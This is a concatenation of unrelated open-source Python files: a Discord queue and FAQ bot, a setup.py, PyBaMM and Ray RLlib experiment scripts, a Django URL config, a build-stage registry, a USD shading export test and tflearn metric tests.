return "451240245468332033" in [role.id for role in user.roles] or "339613815849353219" in [role.id for role in user.roles] or "450680633560399872" in [role.id for role in user.roles] or "449385190926712863" in [role.id for role in user.roles]
@bot.command(pass_context=True)
async def listadd(ctx, user: discord.Member):
if canEditList(ctx.message.author):
message = ""
if not inlist(user.id):
if "\\" in str(user.display_name.encode('unicode_escape')):
index = str(user.display_name.encode('unicode_escape')).find("\\")
name = str(user.display_name.encode('unicode_escape'))[2:index]
else:
name = user.display_name
f = open(dataFiles["list"], "a")
f.write(user.id+"|"+name+"\n")
f.close()
lines = getLines(dataFiles["list"])
message = " has been added to the list."
else:
message = " is already on the list."
await bot.say(user.display_name + message)
@bot.command(pass_context=True)
async def listremove(ctx, user: discord.Member):
if canEditList(ctx.message.author):
if inlist(user.id):
lines = getLines(dataFiles["list"])
file = open(dataFiles["list"], "w")
file.writelines([item for item in lines if user.id not in item and not item.isspace()])
file.close()
await bot.say(user.display_name+" has been removed from the list.")
else:
await bot.say(user.display_name+" is not on the list.")
@bot.command(pass_context=True)
async def list(ctx):
guild = ctx.message.channel.server
lines = getLines(dataFiles["list"])
index=0
n=0
output = ""
embedSent = False
toDelete=[]
async for x in bot.logs_from(guild.get_channel("452213143926734859")):
toDelete.append(x)
if len(toDelete) > 1:
await bot.delete_messages(toDelete)
elif len(toDelete) == 1:
await bot.delete_message(toDelete[0])
for line in lines:
if len(line) > 1:
index = line.find("|")
nums = line[:index]
n += 1
if listDebugState:
print(nums)
output += str(n)+". "+guild.get_member(str(nums)).display_name+"\n"
if len(output) > 1930:
if not embedSent:
embed = discord.Embed(title="List:",description=output)
else:
embed = discord.Embed(description=output)
await bot.send_message(guild.get_channel("452213143926734859"),embed=embed)
output = ""
embedSent = True
goingList = getLines(dataFiles["go"])
goingString = goingList[0]
going = guild.get_member(str(goingString))
output += going.display_name+" is going."
if not embedSent:
embed = discord.Embed(title="List:",description=output)
else:
embed = discord.Embed(description=output)
await bot.send_message(guild.get_channel("452213143926734859"),embed=embed)
@bot.command(pass_context=True)
async def next(ctx, num: int = 0):
if num >= 0:
guild = ctx.message.channel.server
lines = getLines(dataFiles["list"])
count = 0
for line in lines:
index = line.find("|")
id = line[:index]
member = guild.get_member(str(id))
if member.status == guild.get_member(bot.user.id).status:
if count == num:
break
else:
count += 1
if (count+1)%10 == 1:
await bot.say(member.display_name+" is the "+str(count+1)+"st next online person on the list.")
elif (count+1)%10 == 2:
await bot.say(member.display_name+" is the "+str(count+1)+"nd next online person on the list.")
elif (count+1)%10 == 3:
await bot.say(member.display_name+" is the "+str(count+1)+"rd next online person on the list.")
else:
await bot.say(member.display_name+" is the "+str(count+1)+"th next online person on the list.")
@bot.command(pass_context=True)
async def listinsert(ctx, pos: int, user: discord.Member):
if canEditList(ctx.message.author):
if not inlist(user.id):
lines = getLines(dataFiles["list"])
if "\\" in str(user.display_name.encode('unicode_escape')):
index = str(user.display_name.encode('unicode_escape')).find("\\")
name = str(user.display_name.encode('unicode_escape'))[2:index]
else:
name = user.display_name
lines.insert(pos-1,user.id+"|"+name+"\n")
f = open(dataFiles["list"], "w")
f.writelines([item for item in lines if not item.isspace()])
f.close()
await bot.say(user.display_name+" has been inserted into the list at position "+str(pos)+".")
else:
await bot.say(user.display_name+" is already on the list. Please remove them first.")
@bot.command(pass_context=True)
async def listlocate(ctx, user: discord.Member = None):
if user == None:
user=ctx.message.author
lines = getLines(dataFiles["list"])
temp = 0
pos = 0
for line in lines:
temp += 1
if user.id in line:
pos = temp
break
message = ""
if pos > 0:
message = " is in position " + str(pos) + " on the list."
else:
message = " is not on the list."
await bot.say(user.display_name + message)
@bot.command(pass_context=True)
async def setgo(ctx, user: discord.Member):
if canEditList(ctx.message.author):
file = open(dataFiles["go"], "w")
file.write(user.id)
file.close()
await bot.say(user.display_name + " has been set as going.")
@bot.command(pass_context=True)
async def whogo(ctx):
guild = ctx.message.channel.server
lines = getLines(dataFiles["go"])
await bot.say(guild.get_member(lines[0]).display_name + " is going.")
@bot.command(pass_context=True)
async def listpos(ctx, pos: int):
guild = ctx.message.channel.server
lines = getLines(dataFiles["list"])
index = lines[pos-1].find("|")
nums = lines[pos-1][:index]
name = guild.get_member(str(nums)).display_name
await bot.say(name+" is in position "+str(pos)+" on the list.")
@bot.command(pass_context=True)
async def onlinelocate(ctx, user: discord.Member = None):
guild = ctx.message.channel.server
if user == None:
user = ctx.message.author
lines = getLines(dataFiles["list"])
count = 1
for line in lines:
index = line.find("|")
id = line[:index]
member = guild.get_member(str(id))
if member.status == guild.get_member(bot.user.id).status:
if user.id in line:
break
else:
count += 1
if member.display_name != user.display_name:
await bot.say(user.display_name+" is not on the list.")
elif count%10 == 1:
await bot.say(user.display_name+" is the "+str(count)+"st next online person on the list.")
elif count%10 == 2:
await bot.say(user.display_name+" is the "+str(count)+"nd next online person on the list.")
elif count%10 == 3:
await bot.say(user.display_name+" is the "+str(count)+"rd next online person on the list.")
else:
await bot.say(user.display_name+" is the "+str(count)+"th next online person on the list.")
@bot.command(pass_context=True)
async def listdebug(ctx, state: bool):
if "219260963268984832" in ctx.message.author.id:
global listDebugState
listDebugState = state
@bot.event
async def on_message(message):
user = message.author
m = message.content.lower()
lines = getLines(dataFiles["help"])
if not inhelp(user.id) and len(m) <= 50:
responses = []
if "how" in m and "ascend" in m and ("do" in m or "can" in m):
responses.append(faqMessages["HowToAscend"])
if "what" in m and ("ascension" in m or "ascending" in m) and ("is" in m or "does" in m):
responses.append(faqMessages["WhatIsAscension"])
if "how" in m and ("join" in m or "hand" in m or "get in" in m or "enter" in m or ("create" in m and "account" in m)) and "joined" not in m and "joining" not in m and ("can" in m or "do" in m) and "hole" not in m:
responses.append(faqMessages["HowToJoinChurch"])
if "how" in m and "hole" in m and ("get in" in m or "enter" in m or "work" in m) and ("do" in m or "can" in m):
responses.append(faqMessages["HowToEnterHole"])
if "how" in m and "hole" in m and ("get out" in m or "leave" in m or "long" in m) and ("do" in m or "can" in m):
responses.append(faqMessages["HowToGetOut"])
if ("how" in m or "what" in m) and "guardian" in m and ("do" in m or "is" in m or "are" in m):
responses.append(faqMessages["WhatIsGuardian"])
if "help " in m and "email" in m and "is" in m:
responses.append(faqMessages["WhatIsSupportEmail"])
if "change" in m and "avatar" in m and ("do" in m or "can" in m):
responses.append(faqMessages["HowToChangeAvatar"])
if ("should" in m or "do " in m or "can " in m) and ("click" in m or "touch" in m) and "candle" in m and "not" not in m:
responses.append(faqMessages["ShouldIClickCandle"])
if "what" in m and "candle" in m and "happens" not in m:
responses.append(faqMessages["WhatIsCandle"])
if "what" in m and "hole" in m and ("is" in m or "does" in m):
responses.append(faqMessages["WhatIsHole"])
if "how" in m and ("get" in m or "earn" in m or "gain " in m or "receive" in m) and ("points" in m or "dedication" in m or "loyalty" in m or "faith" in m) and ("do" in m or "does" in m or "can" in m):
responses.append(faqMessages["HowToEarnPoint"])
if ("will" in m or "is" in m) and ("be" in m or "potential" in m) and "chat" in m and "there" in m:
responses.append(faqMessages["IsThereAChat"])
if "change" in m and "signature" in m and ("do" in m or "can" in m):
responses.append(faqMessages["HowToChangeSignature"])
if "what" in m and "candle" in m and "happens" in m:
responses.append(faqMessages["WhatHappensToCandle"])
if "what" in m and "are" in m and "whispers" in m:
responses.append(faqMessages["WhatAreWhispers"])
if "what" in m and ("is" in m or "are" in m) and "popcoin" in m:
responses.append(faqMessages["WhatIsPopcoin"])
if "what" in m and ("is" in m or "are" in m) and ("points" in m or "dedication" in m or "loyalty" in m or "faith" in m):
responses.append(faqMessages["WhatArePoints"])
if "what is love" in m:
responses.append(faqMessages["WhatIsLove"])
if "when" in m and ("floor" in m or "accepted" in m):
responses.append(faqMessages["WhenWillIBeAccepted"])
if "what" in m and ("get" in m or "receive" in m or "earn" in m) and "ascend" in m:
responses.append(faqMessages["WhatIsAscension"])
if "what" in m and "vip" in m:
responses.append(faqMessages["WhatIsVip"])
if "can" in m and "see" in m and ("click" in m or "touch" in m) and "candle" in m:
responses.append(faqMessages["WhoClicked"])
if "what" in m and "self" in m and "destruct" in m:
responses.append(faqMessages["WhatIsSelfDestruct"])
if "what" in m and "hand" in m and ("is" in m or "do" in m):
responses.append(faqMessages["WhatIsHand"])
if "what" in m and ("happens" in m or ("do" in m and ("get" in m or "receive" in m or "earn" in m))) and ("leave" in m or "leaving " in m) and "hole" in m:
responses.append(faqMessages["WhatIsResultOfLeaving"])
if "what" in m and "countdown" in m and ("do" in m or "for" in m):
responses.append(faqMessages["WhatIsCountDown"])
if "what" in m and "phone number" in m:
responses.append(faqMessages["WhatIsPhoneNumber"])
if "339567608338710530" in m and "love" in m and "you" in m:
responses.append(faqMessages["Loveyou"])
if "where" in m and "is" in m and "candle" in m:
responses.append(faqMessages["WhereIsTheCandle"])
if "who" in m and "is" in m and "poppy" in m:
responses.append(faqMessages["WhoIsPoppy"])
if "what" in m and "is" in m and "poppy.church" in m:
responses.append(faqMessages["WhatIsPoppyChurch"])
"""Special FAQ"""
if ("we" in m or "i" in m) and " not in a cult" in m:
await bot.send_message(message.channel,message.content)
if "would you wear it" in m:
await bot.send_message(message.channel,"Wear a carrot?")
for answer in responses:
await send(message, user, answer)
await bot.process_commands(message)
@bot.event
async def on_member_remove(member):
if inlist(member.id):
lines = getLines(dataFiles["list"])
file = open(dataFiles["list"], "w")
file.writelines([item for item in lines if member.id not in item and not item.isspace()])
file.close()
print(member.display_name+" removal processed.")
bot.run(getLines(dataFiles["token"])[0]) |
the-stack_106_30694 | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="sfquery",
version="1.0.0",
author="Antonio Menarde, Shalabh Mohan Shrivastava",
author_email="[email protected]",
description="A package to query reliable collections using python or jupyter notebook interfaces",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/amenarde/reliable-collections-cli",
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6'
],
packages=setuptools.find_packages(),
install_requires=['xmljson', 'sfctl', 'ipywidgets'],
) |
the-stack_106_30697 | #
# Compare lithium-ion battery models with and without particle size distibution
#
import numpy as np
import pybamm
pybamm.set_logging_level("INFO")
# load models
models = [
pybamm.lithium_ion.DFN(name="standard DFN"),
pybamm.lithium_ion.DFN(name="particle DFN"),
]
# load parameter values
params = [models[0].default_parameter_values, models[1].default_parameter_values]
def negative_distribution(x):
return 1 + 2 * x / models[1].param.l_n
def positive_distribution(x):
return 1 + 2 * (1 - x) / models[1].param.l_p
params[1]["Negative particle distribution in x"] = negative_distribution
params[1]["Positive particle distribution in x"] = positive_distribution
# set up and solve simulations
t_eval = np.linspace(0, 3600, 100)
sols = []
for model, param in zip(models, params):
sim = pybamm.Simulation(model, parameter_values=param)
sol = sim.solve(t_eval)
sols.append(sol)
output_variables = [
"Negative particle surface concentration",
"Electrolyte concentration",
"Positive particle surface concentration",
"Current [A]",
"Negative electrode potential [V]",
"Electrolyte potential [V]",
"Positive electrode potential [V]",
"Terminal voltage [V]",
"Negative particle distribution in x",
"Positive particle distribution in x",
]
# plot
plot = pybamm.QuickPlot(sols, output_variables=output_variables)
plot.dynamic_plot()
|
the-stack_106_30700 | import itertools
from ray import tune
from collections import OrderedDict
num_seeds = 5
var_env_configs = OrderedDict(
{
"delay": [0] + [2 ** i for i in range(4)],
"dummy_seed": [i for i in range(num_seeds)],
}
)
var_configs = OrderedDict({"env": var_env_configs})
env_config = {
"env": "GymEnvWrapper-Atari",
"env_config": {
"AtariEnv": {
"game": "space_invaders",
"obs_type": "image",
"frameskip": 1,
},
# "GymEnvWrapper": {
"atari_preprocessing": True,
"frame_skip": 4,
"grayscale_obs": False,
"state_space_type": "discrete",
"action_space_type": "discrete",
"seed": 0,
# },
# 'seed': 0, #seed
},
}
algorithm = "DQN"
agent_config = { # Taken from Ray tuned_examples
"adam_epsilon": 0.00015,
"buffer_size": 1000000,
"double_q": False,
"dueling": False,
"exploration_config": {"epsilon_timesteps": 200000, "final_epsilon": 0.01},
"final_prioritized_replay_beta": 1.0,
"hiddens": [512],
"learning_starts": 20000,
"lr": 6.25e-05,
"n_step": 1,
"noisy": False,
"num_atoms": 1,
"num_gpus": 0,
"prioritized_replay": False,
"prioritized_replay_alpha": 0.5,
"prioritized_replay_beta_annealing_timesteps": 2000000,
"rollout_fragment_length": 4,
"target_network_update_freq": 8000,
"timesteps_per_iteration": 10000,
"train_batch_size": 32,
"tf_session_args": {
# note: overriden by `local_tf_session_args`
"intra_op_parallelism_threads": 4,
"inter_op_parallelism_threads": 4,
# "gpu_options": {
# "allow_growth": True,
# },
# "log_device_placement": False,
"device_count": {"CPU": 2},
# "allow_soft_placement": True, # required by PPO multi-gpu
},
# Override the following tf session args on the local worker
"local_tf_session_args": {
"intra_op_parallelism_threads": 4,
"inter_op_parallelism_threads": 4,
},
}
model_config = {
# "model": {
# "fcnet_hiddens": [256, 256],
# "fcnet_activation": "tanh",
# "use_lstm": False,
# "max_seq_len": 20,
# "lstm_cell_size": 256,
# "lstm_use_prev_action_reward": False,
# },
}
eval_config = {
"evaluation_interval": None, # I think this means every x training_iterations
"evaluation_config": {
"explore": False,
"exploration_fraction": 0,
"exploration_final_eps": 0,
"evaluation_num_episodes": 10,
"horizon": 100,
"env_config": {
"dummy_eval": True, # hack Used to check if we are in evaluation mode or training mode inside Ray callback on_episode_end() to be able to write eval stats
"transition_noise": 0
if "state_space_type" in env_config["env_config"]
and env_config["env_config"]["state_space_type"] == "discrete"
else tune.function(lambda a: a.normal(0, 0)),
"reward_noise": tune.function(lambda a: a.normal(0, 0)),
"action_loss_weight": 0.0,
},
},
}
value_tuples = []
for config_type, config_dict in var_configs.items():
for key in config_dict:
assert (
isinstance(var_configs[config_type][key], list)
), "var_config should be a dict of dicts with lists as the leaf values to allow each configuration option to take multiple possible values"
value_tuples.append(var_configs[config_type][key])
cartesian_product_configs = list(itertools.product(*value_tuples))
print("Total number of configs. to run:", len(cartesian_product_configs))
|
the-stack_106_30701 | from view import View
from PIL import Image # type: ignore
class Canvas:
def __init__(self, view: View) -> None:
self.view = view
self.image_number = 0
def paint(self) -> Image:
image = Image.new("RGB", (self.view.width, self.view.height))
self.view.paint(image)
return image
def save(self, count=1) -> None:
for _ in range(count):
image = self.paint()
image.save(f"img/img{self.image_number:08d}.jpg")
self.image_number += 1
|
the-stack_106_30702 | from django.conf.urls import url
from . import views
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
url('^$' , views.get_image, name ='homepage'),
url('^user/' , views.userpage , name='username'),
url('^image/(?P<id>[0-9]+)$' , views.image_details , name ='image'),
url('^comment' , views.p_detail , name='comment'),
url('image-like /<int:pk>' , views.imagelike , name= 'imagepost_like'),
url(r'^search/', views.search, name='searchr'),
]
if settings.DEBUG:
urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
urlpatterns+= static(settings.STATIC_URL, document_root = settings.STATIC_ROOT)
|
the-stack_106_30704 | from collections import namedtuple
import networkx as nx
from fud.errors import UndefinedStage, MultiplePaths
Edge = namedtuple("Edge", ["dest", "stage"])
class Registry:
"""
Defines all the stages and how they transform files from one stage to
another.
"""
def __init__(self, config):
self.config = config
self.graph = nx.DiGraph()
def register(self, stage, src=None, tar=None):
"""
Defines a new stage named `stage` that converts programs from `src` to
`tar`
"""
if src is None:
src = stage.name
if tar is None:
tar = stage.target_stage
self.graph.add_edge(src, tar, stage=stage)
def make_path(self, start, dest, through=[]):
"""
Compute a path from `start` to `dest` that contains all stages
mentioned in `through`.
Raises MultiplePaths if there is more than one matching path for the
(start, dest) pair.
"""
nodes = self.graph.nodes()
if start not in nodes:
raise UndefinedStage(start)
if dest not in nodes:
raise UndefinedStage(dest)
all_paths = list(nx.all_simple_edge_paths(self.graph, start, dest))
# Compute all stage pipelines that can be run.
stage_paths = []
# Minimum cost path
min_cost = None
for path in all_paths:
through_check = set(through)
stage_path = []
# Cost of the Path
path_cost = None
for (src, dst) in path:
if src in through_check:
through_check.remove(src)
stage = self.graph.get_edge_data(src, dst)["stage"]
stage_path.append(stage)
# Get the cost of the path if there is any
# print(self.config.get(("stages", stage.name, "priority")))
cost = self.config.get(("stages", stage.name, "priority"))
if cost is not None:
if path_cost is None:
path_cost = cost
else:
path_cost += cost
# If there are no items left in the --through check then add it
if len(through_check) == 0:
# If this path has a cost, then stage_paths can only have
# one path in it.
if path_cost is not None:
if min_cost is None or path_cost < min_cost:
stage_paths = [stage_path]
elif min_cost == path_cost:
stage_paths.append(stage_path)
min_cost = path_cost
elif min_cost is None:
stage_paths.append(stage_path)
if len(stage_paths) > 1:
p = []
for path in all_paths:
if len(path) == 0:
continue
# Add the starting src
path_str = path[0][0]
for (_, dst) in path:
path_str += f" → {dst}"
cost = self.config.get(("stages", dst, "priority"))
if cost is not None:
path_str += f" (cost: {cost})"
p.append(path_str)
raise MultiplePaths(start, dest, "\n".join(p))
elif len(stage_paths) == 0:
return None
else:
return stage_paths[0]
def __str__(self):
stages = {}
transforms = []
for (src, dst, attr) in sorted(self.graph.edges(data=True)):
transforms.append((src, dst, attr["stage"].description))
if src not in stages:
stages[src] = []
stages[src].append(dst)
all_stages = ""
for (src, dsts) in stages.items():
d = ", ".join(dsts)
all_stages += f"\n{src} → {d}"
all_transforms = "\n".join([f"{s} → {e}: {d}" for (s, e, d) in transforms])
return f"""List of possible stage transformations: {all_stages}
Legend:
{all_transforms}
"""
|
the-stack_106_30705 | #!/pxrpythonsubst
#
# Copyright 2018 Pixar
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import unittest
from pxr import Usd
from pxr import UsdShade
from maya import cmds
from maya import standalone
class testUsdExportShadingInstanced(unittest.TestCase):
@classmethod
def setUpClass(cls):
standalone.initialize('usd')
# Stage with simple (non-nested) instancing.
mayaFile = os.path.abspath('InstancedShading.ma')
cmds.file(mayaFile, open=True, force=True)
usdFilePath = os.path.abspath('InstancedShading.usda')
cmds.loadPlugin('pxrUsd')
cmds.usdExport(mergeTransformAndShape=True, file=usdFilePath,
shadingMode='displayColor', exportInstances=True,
materialsScopeName='Materials',
exportCollectionBasedBindings=True,
exportMaterialCollections=True,
materialCollectionsPath="/World")
cls._simpleStage = Usd.Stage.Open(usdFilePath)
# Stage with nested instancing.
mayaFile = os.path.abspath('NestedInstancedShading.ma')
cmds.file(mayaFile, open=True, force=True)
usdFilePath = os.path.abspath('NestedInstancedShading.usda')
cmds.loadPlugin('pxrUsd')
cmds.usdExport(mergeTransformAndShape=True, file=usdFilePath,
shadingMode='displayColor', exportInstances=True,
materialsScopeName='Materials',
exportCollectionBasedBindings=True,
exportMaterialCollections=True,
materialCollectionsPath="/World")
cls._nestedStage = Usd.Stage.Open(usdFilePath)
@classmethod
def tearDownClass(cls):
standalone.uninitialize()
def testInstancedGeom(self):
"""Tests that different shader bindings are correctly authored on
instanced geometry."""
worldPath = "/World" # Where collections are authored
redMat = "/World/Materials/blinn1SG"
redPaths = ["/World/redCube", "/World/redSphere"]
blueMat = "/World/Materials/phong1SG"
bluePaths = [
"/World/blueCube", "/World/blueSphere", "/World/blueSphere2"]
instanceMasters = [
"/InstanceSources/World_redSphere_blueSphereMultiAssignShape",
"/InstanceSources/World_blueCube_blueCubeShape"]
for path in redPaths:
prim = self._simpleStage.GetPrimAtPath(path)
self.assertTrue(prim.IsInstance())
bindingAPI = UsdShade.MaterialBindingAPI(prim)
mat, rel = bindingAPI.ComputeBoundMaterial()
self.assertEqual(mat.GetPath(), redMat)
self.assertEqual(rel.GetPrim().GetPath(), worldPath)
for path in bluePaths:
prim = self._simpleStage.GetPrimAtPath(path)
self.assertTrue(prim.IsInstance())
bindingAPI = UsdShade.MaterialBindingAPI(prim)
mat, rel = bindingAPI.ComputeBoundMaterial()
self.assertEqual(mat.GetPath(), blueMat)
self.assertEqual(rel.GetPrim().GetPath(), worldPath)
for path in instanceMasters:
prim = self._simpleStage.GetPrimAtPath(path)
self.assertTrue(prim)
self.assertFalse(
prim.HasRelationship(UsdShade.Tokens.materialBinding))
def testInstancedGeom_Subsets(self):
"""Tests that instanced geom with materials assigned to subsets are
automatically de-instanced."""
multiAssignPrim = self._simpleStage.GetPrimAtPath(
"/World/blueSphereMultiAssign")
self.assertFalse(multiAssignPrim.IsInstanceable())
shape = multiAssignPrim.GetChild("Shape")
self.assertFalse(shape.IsInstance())
subset1 = shape.GetChild("initialShadingGroup")
self.assertTrue(subset1)
mat, _ = UsdShade.MaterialBindingAPI(subset1).ComputeBoundMaterial()
self.assertEqual(mat.GetPath(), "/World/Materials/initialShadingGroup")
subset2 = shape.GetChild("blinn1SG")
self.assertTrue(subset2)
mat, _ = UsdShade.MaterialBindingAPI(subset2).ComputeBoundMaterial()
self.assertEqual(mat.GetPath(), "/World/Materials/blinn1SG")
def testUninstancedGeom(self):
"""Tests a basic case of non-instanced geometry with bindings."""
worldPath = "/World" # Where collections are authored
redMat = self._simpleStage.GetPrimAtPath("/World/Materials/blinn1SG")
uninstancedPrim = self._simpleStage.GetPrimAtPath("/World/notInstanced")
self.assertFalse(uninstancedPrim.IsInstance())
bindingAPI = UsdShade.MaterialBindingAPI(uninstancedPrim)
mat, rel = bindingAPI.ComputeBoundMaterial()
self.assertEqual(mat.GetPrim(), redMat)
self.assertEqual(rel.GetPrim().GetPath(), worldPath)
def testNestedInstancedGeom(self):
"""Tests that different shader bindings are correctly authored on
instanced geometry within nested instances."""
worldPath = "/World" # Where collections are authored
greenMat = "/World/Materials/blinn1SG"
greenPaths = [
"/World/SimpleInstance1/Shape",
"/World/ComplexA/NestedA/Base1/BaseShape1",
"/World/ComplexA/NestedB/Base1/BaseShape1",
"/World/Extra/Base3/Shape",
"/World/ComplexB/NestedA/Base1/BaseShape1",
"/World/ComplexB/NestedB/Base1/BaseShape1"]
blueMat = "/World/Materials/blinn2SG"
bluePaths = [
"/World/SimpleInstance2/Shape",
"/World/ComplexA/NestedA/Base2/BaseShape1",
"/World/ComplexA/NestedB/Base2/BaseShape1",
"/World/ComplexB/NestedA/Base2/BaseShape1",
"/World/ComplexB/NestedB/Base2/BaseShape1"]
instanceMasters = [
"/InstanceSources/World_ComplexA_NestedA_Base1_BaseShape1" +
"/Shape",
"/InstanceSources/World_SimpleInstance1_SimpleInstanceShape1" +
"/Shape"]
for path in greenPaths:
prim = self._nestedStage.GetPrimAtPath(path)
self.assertTrue(prim, msg=path)
self.assertTrue(prim.IsInstanceProxy())
bindingAPI = UsdShade.MaterialBindingAPI(prim)
mat, rel = bindingAPI.ComputeBoundMaterial()
self.assertEqual(mat.GetPath(), greenMat)
self.assertEqual(rel.GetPrim().GetPath(), worldPath)
for path in bluePaths:
prim = self._nestedStage.GetPrimAtPath(path)
self.assertTrue(prim, msg=path)
self.assertTrue(prim.IsInstanceProxy())
bindingAPI = UsdShade.MaterialBindingAPI(prim)
mat, rel = bindingAPI.ComputeBoundMaterial()
self.assertEqual(mat.GetPath(), blueMat)
self.assertEqual(rel.GetPrim().GetPath(), worldPath)
for path in instanceMasters:
prim = self._nestedStage.GetPrimAtPath(path)
self.assertTrue(prim)
self.assertFalse(
prim.HasRelationship(UsdShade.Tokens.materialBinding))
if __name__ == '__main__':
unittest.main(verbosity=2)
|
the-stack_106_30708 | import zqtflearn
import unittest
import numpy as np
import tensorflow as tf
class TestMetrics(unittest.TestCase):
"""
Testing metric functions from zqtflearn/metrics
"""
def test_binary_accuracy(self):
with tf.Graph().as_default():
input_data = tf.placeholder(shape=[None, 1], dtype=tf.float32)
y_true = tf.placeholder(shape=[None, 1], dtype=tf.float32)
ba = zqtflearn.metrics.accuracy()
ba.build(input_data, y_true)
acc_op = ba.tensor
X = np.array([1,-1,1,1,-1,-1]).reshape([-1, 1])
Y = np.array([1,0,1,0,0,1]).reshape([-1, 1])
with tf.Session() as sess:
binary_accuracy = sess.run(acc_op, feed_dict={input_data: X, y_true: Y})
print ("binary_accuracy = %s" % binary_accuracy)
self.assertEqual(acc_op.m_name, "binary_acc")
self.assertLess(abs(binary_accuracy-4.0/6), 0.0001)
def test_categorical_accuracy(self):
with tf.Graph().as_default():
input_data = tf.placeholder(shape=[None, 2], dtype=tf.float32)
y_true = tf.placeholder(shape=[None, 2], dtype=tf.float32)
ba = zqtflearn.metrics.accuracy()
ba.build(input_data, y_true)
acc_op = ba.tensor
X = np.array([1,-1, -1, 1, 0.5, 0]).reshape([-1, 2])
Y = np.array([1, 0, 0, 1, 0, 1]).reshape([-1, 2])
with tf.Session() as sess:
accuracy = sess.run(acc_op, feed_dict={input_data: X, y_true: Y})
print ("categorical accuracy = %s" % accuracy)
self.assertEqual(acc_op.m_name, "acc")
self.assertLess(abs(accuracy - 2.0/3), 0.0001)
X = np.array([1,-1, -1, 1, 0.5, 0]).reshape([-1, 2])
Y = np.array([1, 0, 0, 1, 1, 0]).reshape([-1, 2])
with tf.Session() as sess:
accuracy = sess.run(acc_op, feed_dict={input_data: X, y_true: Y})
print ("categorical accuracy = %s" % accuracy)
self.assertEqual(accuracy, 1.0)
if __name__ == "__main__":
unittest.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.